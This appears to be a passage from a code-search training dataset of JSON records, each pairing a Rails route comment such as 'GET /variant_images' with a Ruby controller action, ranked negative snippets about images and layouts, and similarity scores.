"def get_content_for_layout()\n get_partial(@type)\n # if @type == \"home\"\n # get_partial('home')\n # elsif @type == \"page\"\n # get_partial('page')\n # elsif @type == \"article\"\n # get_partial('article')\n # elsif @type == \"category\"\n # get_partial('category')\n # end\n end",
"def layout_by_resource\n if devise_controller? && resource_class == Pilot\n \"pilot_devise\"\n elsif devise_controller? && resource_class == Operator\n \"operator_devise\"\n else\n \"application\"\n end\nend",
"def choose_layout\n request.xhr? && uses_modal? ? false : super\n end",
"def layouts=(_arg0); end",
"def layouts=(_arg0); end",
"def specify_layout\n if devise_controller?\n if !(current_user.nil?)\n \"application\"\n else\n \"sign_in\"\n end\n else\n \"application\"\n end\n end",
"def choose_layout\n request.xhr? ? 'modal' : 'front'\n end",
"def choose_layout\n request.xhr? ? 'modal' : 'front'\n end",
"def layout\n return @layout if @layout\n return if no_layout?\n\n @layout = site.layouts[data.layout].tap do |layout|\n unless layout\n Bridgetown.logger.warn \"Generated Page:\", \"Layout '#{data.layout}' \" \\\n \"requested via #{relative_path} does not exist.\"\n end\n end\n end",
"def default_layout\n nil\n end",
"def static_layout\n nil\n end",
"def default_layout\n @user = User.current\n # remove block in all groups\n @user.pref[:my_page_layout] = nil\n @user.pref.save\n redirect_to :action => 'page_layout'\n end",
"def resolve_layout\n case action_name\n when \"edit\"\n \"editlayout\"\n when \"show_image\"\n \"application_png\"\n else\n \"application\"\n end\n end",
"def new\n @page_layout = PageLayout.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @page_layout }\n end\n end",
"def set_layout\n @layoutme = 1\n end",
"def show\n render layout: 'home'\n end"
] | [
"0.71749175",
"0.7162006",
"0.7027256",
"0.6980907",
"0.6917183",
"0.68840367",
"0.6877608",
"0.6793758",
"0.67735374",
"0.67581904",
"0.6729416",
"0.67260855",
"0.6697271",
"0.66890544",
"0.66890544",
"0.6635262",
"0.66183877",
"0.6584618",
"0.6550475",
"0.6541904",
"0.653372",
"0.65006804",
"0.6495991",
"0.64484453",
"0.64479303",
"0.6442261",
"0.6436061",
"0.64213216",
"0.64120597",
"0.63995975",
"0.639645",
"0.6396121",
"0.63726896",
"0.63635874",
"0.636341",
"0.6336849",
"0.63261265",
"0.6307993",
"0.6257147",
"0.625134",
"0.62448114",
"0.62275386",
"0.6217237",
"0.62152284",
"0.621424",
"0.61694324",
"0.61611986",
"0.6156502",
"0.61509484",
"0.61417264",
"0.61401117",
"0.6139096",
"0.6128187",
"0.6127131",
"0.61230636",
"0.6121924",
"0.60951483",
"0.60948324",
"0.60866576",
"0.608522",
"0.6067971",
"0.6065014",
"0.6054026",
"0.6053792",
"0.6047346",
"0.6042625",
"0.6036837",
"0.60320956",
"0.60231256",
"0.60061455",
"0.59963757",
"0.59950846",
"0.59950674",
"0.5991815",
"0.59797287",
"0.59797287",
"0.5950728",
"0.594826",
"0.5926326",
"0.59263164",
"0.5907631",
"0.59062576",
"0.5901988",
"0.58997434",
"0.5896648",
"0.58937323",
"0.58829224",
"0.5877107",
"0.5877107",
"0.58671093",
"0.5866169",
"0.5866169",
"0.58568746",
"0.5850727",
"0.5848813",
"0.5839869",
"0.5837307",
"0.5832929",
"0.582405",
"0.5823002"
] | 0.70369416 | 2 |
GET /variant_images GET /variant_images.json | def index
@variant_images = VariantImage.all
respond_to do |format|
format.html # index.html.erb
format.json { render json: @variant_images }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def show\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n\n respond_to do |format|\n format.html # show.html.erb\n format.js\n format.json { render json: @variant_image }\n end\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def index\n @product_images = ProductImage.where(product_uuid: params[:product_id])\n render json: @product_images, status: 200\n end",
"def images\n response = JSON.parse( self.class.get(\"#{BASE_URL}/contest/#{@api_key}/images\") )\n end",
"def image_list\n @images = Picture.where(album_id: params[:album_id])\n respond_to do |format|\n format.json { render json: @images.to_json(methods: [:path])}\n end\n end",
"def images\n IbmCloudRest.get \"#{@uri}/images\"\n end",
"def images() \n uri = URI.parse(\"http://\" + @location.host + \":9292/v2/images\")\n return get_request(uri, @token)\n end",
"def index\n @images = Image.all\n\n render json: @images\n end",
"def product_images\n user_id, product = params[:user_id], params[:id]\n return bad_request if !user_id || !product\n # returns all images for a given user and product\n images = UserProduct.find_images(user_id, product)\n # create json array\n img = images ? images.collect { |i| i.js_serialize } : []\n render :json => img\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def images(product_id, variation_id, params = {})\n path = \"/products/#{product_id}/variations/#{variation_id}/images\"\n\n response, status = BeyondApi::Request.get(@session,\n path,\n params)\n\n handle_response(response, status)\n end",
"def get_all_images(env)\n images_json = get(env, \"#{@session.endpoints[:image]}/images\")\n images = JSON.parse(images_json)['images']\n\n return images if images.empty?\n\n is_v1 = false\n unless images[0].key? 'visibility'\n is_v1 = true\n images_json = get(env, \"#{@session.endpoints[:image]}/images/detail\")\n images = JSON.parse(images_json)['images']\n end\n\n images.map do |i|\n i['visibility'] = i['is_public'] ? 'public' : 'private' if is_v1\n Image.new(i['id'], i['name'], i['visibility'], i['size'], i['min_ram'], i['min_disk'])\n end\n end",
"def list\n @api.get(\"#{@api.path}/Images\")\n end",
"def images\n @picturesandmeta = Pictureandmeta.all\n @kind = Kind.find(params[:kind_id])\n Rails.logger.info(\"Kind: #{@kind.inspect}\")\n end",
"def index\n @variants = Variant.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variants }\n end\n end",
"def _state_photos(state_id)\n get('state/photos', state_id, options: { type: :array })\n end",
"def items\n @beverages = Beverage.available\n respond_to do |format|\n format.json { render :json => @beverages.to_json(methods: :image_url)}\n end\n end",
"def index\n @pictures = Picture.where(foodscape_id: params[:foodscape_id])\n render json: @pictures\n end",
"def show\n render json: @family_image\n end",
"def images\n images = []\n JSON.parse(resource['/offerings/image'].get)[\"images\"].each do |img|\n images << Image.new(img)\n end\n return images\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.slim\n format.json { render json: @images }\n end\n end",
"def show\n render json:@web_display_car_image\n end",
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def get_sizes\n @item = Item.find(params[:id])\n @sizes = @item.variants_for(:size, nil, params[:colour])\n respond_to do |format|\n format.json { render :json => @sizes }\n end\n end",
"def get_images_data\t\t\t\t\t\t\n\t\t{ payload: { 'makes' => makes_dropdown, 'images' => images_array('none').compact}, success: true}\n\tend",
"def show\n @image_url = ImageUrl.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_url }\n end\n end",
"def getimagesinfo\n trek = Trek.find_by_id(params[:id])\n send_data(trek.get_images_info.to_json,\n {:type => \"application/json\", :disposition => \"inline\"})\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def images(params = {})\n @api.get(\"#{@api.path}/List/#{@id}/Images\", params: params)\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n render json: @web_car_gallery\n end",
"def index\n @family_images = FamilyImage.all\n\n render json: @family_images\n end",
"def show\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estate_agent_image }\n end\n end",
"def show\n @image_set = ImageSet.find(params[:id])\n\n render json: @image_set\n end",
"def index\n @images = getmydata(\"Image\")\n pagination\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def images\n @assets = filtered_assets.where(type: \"Image\").order(\"created_at DESC\").paginate(params)\n @assets = @assets.search(params[:q], fuzzy: true) if params[:q].present?\n respond_to do |format|\n format.html do\n render template: \"/dash/chooser/images\"\n end\n format.js do\n render template: \"/dash/chooser/images_search\"\n end\n end\n end",
"def images\n bugImages = BugImage.all\n render :json => bugImages.to_json\n end",
"def show\n @image_gallery = ImageGallery.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_gallery }\n end\n end",
"def index\n if params[:single]\n\t url = \"#{API_BASE_URL}/photos/#{params[:id]}.json?token=#{ENV['API_KEY']}\"\n\t response = RestClient.get(url)\n\t @photo = JSON.parse(response.body)\n\telse\n\t url = \"#{API_BASE_URL}/photos.json?token=#{ENV['API_KEY']}\"\n response = RestClient.get(url)\n @photos = JSON.parse(response.body)\t\t \n\tend\n end",
"def get_images\n {}\n end",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def get_images\n @command = :get_images\n # set a flag indicating whether or not the user wants to see all images,\n # including the hidden ones\n show_hidden = (@prev_args.peek(0) == \"-i\" || @prev_args.peek(0) == \"--hidden\")\n # get the images from the RESTful API (as an array of objects)\n uri_str = ( show_hidden ? \"#{@uri_string}?hidden=true\" : @uri_string )\n uri = URI.parse uri_str\n result = hnl_http_get(uri)\n unless result.blank?\n # convert it to a sorted array of objects (from an array of hashes)\n sort_fieldname = 'filename'\n result = hash_array_to_obj_array(expand_response_with_uris(result), sort_fieldname)\n end\n # and print the result\n print_object_array(result, \"Images:\", :style => :table)\n end",
"def show\n render json: @sample_photo\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @pictures = TaxiSevice.find(params[:id]).taxi_images\n end",
"def index\n @slider_images = SliderImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def index\n @slider_image_types = SliderImageType.all\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def show\n @product = Product.includes(:images).find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @product }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def show\n coach = Coach.find(params[:id])\n json = coach.to_json({:image_url => ActionController::Base.helpers.asset_path(coach.image_url)})\n\n respond_to do |format|\n format.json {render :json => json}\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\t\t\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @match_image = MatchImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @match_image }\n end\n end",
"def show\n render json: @picture\n end",
"def images\n Image.where(product_id: id)\nend",
"def index\n @cap_image = fetch_cap_image(params['q'])\n\n if @cap_image.nil?\n @cap_image = CapImage.all.first\n flash.now[:alert] = 'Couldn\\'t fetch random image. Here\\'s one from the archives.'\n end\n\n respond_to do |format|\n format.html\n format.json { render json: @cap_image }\n end\n end",
"def show\n @motivational_image = MotivationalImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @motivational_image }\n end\n end",
"def index\n @web_display_car_images = WebDisplayCarImage.all\n\n render json:@web_display_car_images\n end",
"def status_images\n response = JSON.parse(@client.get(\"/api/v1/status-images\").body)\n return response[\"images\"] || response\n end",
"def images\n {\n thumbnail: object.thumbnail.url(:large),\n logo: object.logo.url(:medium),\n white_logo: object.white_logo.url(:medium)\n }\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render json: @article, methods: [:image_url] }\n end\n end",
"def index\n @pictures = @album.pictures #JRD111115\n\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @pictures}\n end\n end",
"def show\n #Finds selected image\n @image = Image.find(params[:id])\n @all_products = Product.all\n @all_properties = Property.all\n\n respond_to do |format|\n format.html # show.html.erbml.erb\n format.json { render json: @image }\n format.js\n end\n end",
"def images()\n @photos = all_photos() \n @headers['Content-Type'] = CONTENT_TYPE\n end",
"def marketplace_image_my_images_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: VnfsApi.marketplace_image_my_images ...'\n end\n # resource path\n local_var_path = '/1.0.0/marketplace/image/my_images/'\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['oAuth2']\n data, status_code, headers = @api_client.call_api(:GET, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'InlineResponse2009')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: VnfsApi#marketplace_image_my_images\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def photos(id, group = 'checkin', options = {})\n get(\"venues/#{id}/photos\", {:group => group }.merge(options)).photos\n end",
"def get_images\n images = get(\"cloud-instances/#{guid}/images\")[\"images\"] || []\n\n images.map do |image|\n get_image(image[\"imageID\"])\n end.compact\n end",
"def index\n @market_segment_images = @market_segment_imageable.market_segment_images\n\n respond_to do |format|\n format.html # index.html.erb\n end\n end",
"def images artist\n url = \"http://developer.echonest.com/api/v4/artist/images?api_key=#{ECHONEST_API_KEY}&name=#{artist}&format=json&results=#{RESULTS}&start=0&license=unknown\"\n result = parseURL url\n result[\"response\"][\"images\"]\nend",
"def photos options={}\n response = client.get(\"/#{id}/photos\", options)\n end",
"def get_img_tags\n @tp = Temp.find_by_id(params[:id])\n @tp.included_images \n render :json => @tp.included_images\n # render :text => @tp.included_images \n end",
"def show\r\n @car_image = CarImage.find(params[:id])\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @car_image }\r\n end\r\n end",
"def show\n render json: @thumb\n end",
"def images(artist, options={})\n get(:standard, {:method => \"artist.getImages\", :artist => artist}.merge(options))\n end",
"def show\n @product = Product.find(params[:id]) \n @admin_images = Image.admins_photos.where(product_id: @product.id).order(:title) || []\n @users_images = Image.users_photos.where(product_id: @product.id).order(:title) || []\n respond_to do |format|\n format.html\n format.js \n format.json { render json: @product }\n end\n end",
"def list_images # :nologin:\n query = create_query(:Image, :all, :by => :created_at)\n show_selected_images(query)\n end",
"def index\n render json: Picture.all\n end",
"def show\n render json: @picture, status: :ok\n end",
"def show\n @images = @galleries_album.galleries\n end",
"def show\n @bgimage = Bgimage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @bgimage }\n end\n end",
"def show\n @pictures = TourService.find(params[:id]).tour_images\n # render :show\n end",
"def index\n wishes = Wish.all.with_attached_image.where(is_secret: false)\n render json: { wishes: generate_image_url(wishes) }\n end",
"def index\n @img_lists = ImgList.all\n render json: @img_lists\n end",
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @recipe_images = RecipeImage.all\n end",
"def show\n album = Album.includes(:album_images).find(params[:id])\n return_hash = album.attributes\n return_hash['album_images'] = album.album_images\n render json: return_hash\n end",
"def index\n @images = Image.all\n respond_with @images\n end",
"def images\n []\n end",
"def get_colours\n @item = Item.find(params[:id])\n @colours = @item.variants_for(:colour, params[:size], nil)\n respond_to do |format|\n format.json { render :json => @colours }\n end\n end",
"def show\n @property_image = PropertyImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @property_image }\n end\n end",
"def show\n @instance = Instance.find(params[:id])\n @flavor = Flavor.find_by_flavor_id(@instance.flavor_id)\n @image = Image.find_by_image_id(@instance.image_id)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @instance }\n end\n end",
"def show\n @category_image = CategoryImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @category_image }\n end\n end"
] | [
"0.72741795",
"0.72619855",
"0.7065044",
"0.7058683",
"0.68506616",
"0.6846892",
"0.6785741",
"0.67399204",
"0.66757697",
"0.6659554",
"0.6637402",
"0.6637402",
"0.6605622",
"0.6602113",
"0.6601908",
"0.65993196",
"0.6594103",
"0.65900457",
"0.6587071",
"0.65866446",
"0.6584074",
"0.658382",
"0.65725535",
"0.6560661",
"0.6527081",
"0.65111953",
"0.65000814",
"0.6494236",
"0.64889586",
"0.64835715",
"0.6452451",
"0.64392745",
"0.6435668",
"0.64354694",
"0.6431692",
"0.63823014",
"0.6378937",
"0.63742584",
"0.6353165",
"0.63500136",
"0.6348642",
"0.6334541",
"0.6333671",
"0.6333029",
"0.6329741",
"0.6322984",
"0.6322984",
"0.6322984",
"0.6322984",
"0.632007",
"0.6317408",
"0.6306685",
"0.63028026",
"0.62962806",
"0.62962806",
"0.62818766",
"0.6270492",
"0.6267543",
"0.6267222",
"0.6266554",
"0.6252117",
"0.62505436",
"0.62421894",
"0.62398607",
"0.62315",
"0.6229657",
"0.6227675",
"0.62271065",
"0.62251335",
"0.62214047",
"0.6216607",
"0.62058395",
"0.62058395",
"0.62002957",
"0.61999786",
"0.61860687",
"0.6183684",
"0.61817896",
"0.6179855",
"0.61713713",
"0.61662155",
"0.61601275",
"0.6155993",
"0.61556387",
"0.6155223",
"0.6147296",
"0.6145668",
"0.6144238",
"0.61427766",
"0.6140481",
"0.6139509",
"0.61392903",
"0.6133928",
"0.6128057",
"0.61234856",
"0.6118853",
"0.611544",
"0.61142117",
"0.61104566",
"0.61030346"
] | 0.7974657 | 0 |
GET /variant_images/1 GET /variant_images/1.json | def show
@variant_image = VariantImage.find(params[:id])
@variant = @variant_image.variant
respond_to do |format|
format.html # show.html.erb
format.js
format.json { render json: @variant_image }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def index\n @variant_images = VariantImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variant_images }\n end\n end",
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def index\n @product_images = ProductImage.where(product_uuid: params[:product_id])\n render json: @product_images, status: 200\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def index\n if params[:single]\n\t url = \"#{API_BASE_URL}/photos/#{params[:id]}.json?token=#{ENV['API_KEY']}\"\n\t response = RestClient.get(url)\n\t @photo = JSON.parse(response.body)\n\telse\n\t url = \"#{API_BASE_URL}/photos.json?token=#{ENV['API_KEY']}\"\n response = RestClient.get(url)\n @photos = JSON.parse(response.body)\t\t \n\tend\n end",
"def show\n @image_url = ImageUrl.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_url }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def image_list\n @images = Picture.where(album_id: params[:album_id])\n respond_to do |format|\n format.json { render json: @images.to_json(methods: [:path])}\n end\n end",
"def index\n @pictures = Picture.where(foodscape_id: params[:foodscape_id])\n render json: @pictures\n end",
"def show\n @image = Image.find(params[:id])\n\t\t\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def images\n @picturesandmeta = Pictureandmeta.all\n @kind = Kind.find(params[:kind_id])\n Rails.logger.info(\"Kind: #{@kind.inspect}\")\n end",
"def show\n @image_set = ImageSet.find(params[:id])\n\n render json: @image_set\n end",
"def index\n @images = Image.all\n\n render json: @images\n end",
"def images\n response = JSON.parse( self.class.get(\"#{BASE_URL}/contest/#{@api_key}/images\") )\n end",
"def show\n render json:@web_display_car_image\n end",
"def show\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estate_agent_image }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.slim\n format.json { render json: @images }\n end\n end",
"def show\n render json: @family_image\n end",
"def show\n @motivational_image = MotivationalImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @motivational_image }\n end\n end",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def getimagesinfo\n trek = Trek.find_by_id(params[:id])\n send_data(trek.get_images_info.to_json,\n {:type => \"application/json\", :disposition => \"inline\"})\n end",
"def index\n @cap_image = fetch_cap_image(params['q'])\n\n if @cap_image.nil?\n @cap_image = CapImage.all.first\n flash.now[:alert] = 'Couldn\\'t fetch random image. Here\\'s one from the archives.'\n end\n\n respond_to do |format|\n format.html\n format.json { render json: @cap_image }\n end\n end",
"def show\n @image_gallery = ImageGallery.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_gallery }\n end\n end",
"def show\n @match_image = MatchImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @match_image }\n end\n end",
"def get_image_by_uuid\n @command = :get_image_by_uuid\n # the UUID was the last \"previous argument\"\n image_uuid = @prev_args.peek(0)\n # setup the proper URI depending on the options passed in\n uri = URI.parse(@uri_string + '/' + image_uuid)\n # and get the results of the appropriate RESTful request using that URI\n result = hnl_http_get(uri)\n # finally, based on the options selected, print the results\n print_object_array(hash_array_to_obj_array([result]), \"Image:\")\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def get_all_images(env)\n images_json = get(env, \"#{@session.endpoints[:image]}/images\")\n images = JSON.parse(images_json)['images']\n\n return images if images.empty?\n\n is_v1 = false\n unless images[0].key? 'visibility'\n is_v1 = true\n images_json = get(env, \"#{@session.endpoints[:image]}/images/detail\")\n images = JSON.parse(images_json)['images']\n end\n\n images.map do |i|\n i['visibility'] = i['is_public'] ? 'public' : 'private' if is_v1\n Image.new(i['id'], i['name'], i['visibility'], i['size'], i['min_ram'], i['min_disk'])\n end\n end",
"def show\n @pictures = TaxiSevice.find(params[:id]).taxi_images\n end",
"def show\n @property_image = PropertyImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @property_image }\n end\n end",
"def show\n render json: @sample_photo\n end",
"def images() \n uri = URI.parse(\"http://\" + @location.host + \":9292/v2/images\")\n return get_request(uri, @token)\n end",
"def show\r\n @car_image = CarImage.find(params[:id])\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @car_image }\r\n end\r\n end",
"def show\n @s3_image = S3Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @s3_image }\n end\n end",
"def index\n @variants = Variant.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variants }\n end\n end",
"def show\n @review_image = ReviewImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @review_image }\n end\n end",
"def images\n IbmCloudRest.get \"#{@uri}/images\"\n end",
"def show\n @product = Product.includes(:images).find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @product }\n end\n end",
"def list\n @api.get(\"#{@api.path}/Images\")\n end",
"def show\n @image_upload = ImageUpload.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_upload }\n end\n end",
"def items\n @beverages = Beverage.available\n respond_to do |format|\n format.json { render :json => @beverages.to_json(methods: :image_url)}\n end\n end",
"def show\n @bgimage = Bgimage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @bgimage }\n end\n end",
"def show\n @instance = Instance.find(params[:id])\n @flavor = Flavor.find_by_flavor_id(@instance.flavor_id)\n @image = Image.find_by_image_id(@instance.image_id)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @instance }\n end\n end",
"def product_images\n user_id, product = params[:user_id], params[:id]\n return bad_request if !user_id || !product\n # returns all images for a given user and product\n images = UserProduct.find_images(user_id, product)\n # create json array\n img = images ? images.collect { |i| i.js_serialize } : []\n render :json => img\n end",
"def get_sizes\n @item = Item.find(params[:id])\n @sizes = @item.variants_for(:size, nil, params[:colour])\n respond_to do |format|\n format.json { render :json => @sizes }\n end\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def index\n @images = getmydata(\"Image\")\n pagination\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def show\n render json: @picture\n end",
"def _state_photos(state_id)\n get('state/photos', state_id, options: { type: :array })\n end",
"def show\n @imagem = Imagem.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @imagem }\n end\n end",
"def show\n coach = Coach.find(params[:id])\n json = coach.to_json({:image_url => ActionController::Base.helpers.asset_path(coach.image_url)})\n\n respond_to do |format|\n format.json {render :json => json}\n end\n end",
"def show\n @category_image = CategoryImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @category_image }\n end\n end",
"def image(id, nsfw = false)\n img = get url: \"images/#{id}\", nsfw: nsfw\n img['image'] if img\n end",
"def show\n @image = ImagePost.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n render json: @web_car_gallery\n end",
"def show\n #Finds selected image\n @image = Image.find(params[:id])\n @all_products = Product.all\n @all_properties = Property.all\n\n respond_to do |format|\n format.html # show.html.erbml.erb\n format.json { render json: @image }\n format.js\n end\n end",
